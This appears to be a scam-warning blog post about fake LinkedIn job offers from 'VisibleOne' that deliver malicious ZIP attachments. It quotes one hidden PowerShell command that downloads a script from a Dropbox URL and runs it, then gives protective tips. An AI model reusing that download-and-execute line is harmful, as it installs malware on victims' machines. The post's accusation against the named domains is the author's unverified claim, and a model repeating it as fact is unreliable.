Introduction
Scammers are becoming more sophisticated in their attempts to deceive job seekers, and one such fraudulent company operating under the name VisibleOne has been targeting professionals via LinkedIn. If you have received an email from hr@visibleone.co, be warned—it is a scam designed to install malware on your system and steal sensitive information.
How the Scam Works
1. Fake Job Offer on LinkedIn
The scam begins with a job posting on LinkedIn, usually for a marketing, IT, or remote work position. Once you apply, you receive a response claiming they were “highly impressed” with your CV and want to proceed with your application.
2. Email from hr@visibleone.co
Shortly after, the scammer emails hr@visibleone.co expressing enthusiasm about your qualifications. The email looks professional, but it contains a dangerous attachment: a ZIP file that supposedly includes interview details or a company introduction video.
3. Malicious ZIP File
When you extract the ZIP file, you will find what appears to be a video file. However, alongside the video, there is also a hidden malicious script or an executable file that, when clicked, will infect your computer with malware.
One of the scripts they use is:
C:\Windows\System32\cmd.exe /c PowerShell -WindowStyle Hidden -Command "Iex (irm 'https://f3ugaztdy9w.dl.dropboxusercontent.com/...')"
This command downloads and executes a malicious script in the background without the user’s knowledge, potentially installing keyloggers, backdoors, or other malware designed to steal your personal and financial information.
VisibleOne.co & VisibleOne.com Are the Same
It is important to note that VisibleOne.co and VisibleOne.com are the same entity, likely operated by the same scammers. They may use different domains to appear more legitimate, but both are part of the fraudulent scheme. Be cautious of any communication from either domain.
How to Protect Yourself
✅ Verify the company’s legitimacy – Check their official website, social media, and employee profiles. VisibleOne has very little credible online presence.
✅ Never open unknown ZIP or executable files – Legitimate companies do not send job-related materials in compressed folders that include suspicious files.
✅ Scan files before opening them – Use online virus scanners like VirusTotal to check suspicious files.
✅ Look out for suspicious email addresses – Scammers often use domains that sound official but are not linked to a legitimate company.
✅ Report the scam – If you received this email, report it as phishing to LinkedIn, your email provider, and cybersecurity authorities.
Conclusion
VisibleOne.co & VisibleOne.com are not a legitimate company but rather a scam operation attempting to compromise job seekers’ computers. If you have received an email from hr@visibleone.co, do not open any attachments, delete the email immediately, and run a security scan on your system. Stay vigilant and always double-check job offers before engaging with unknown companies.
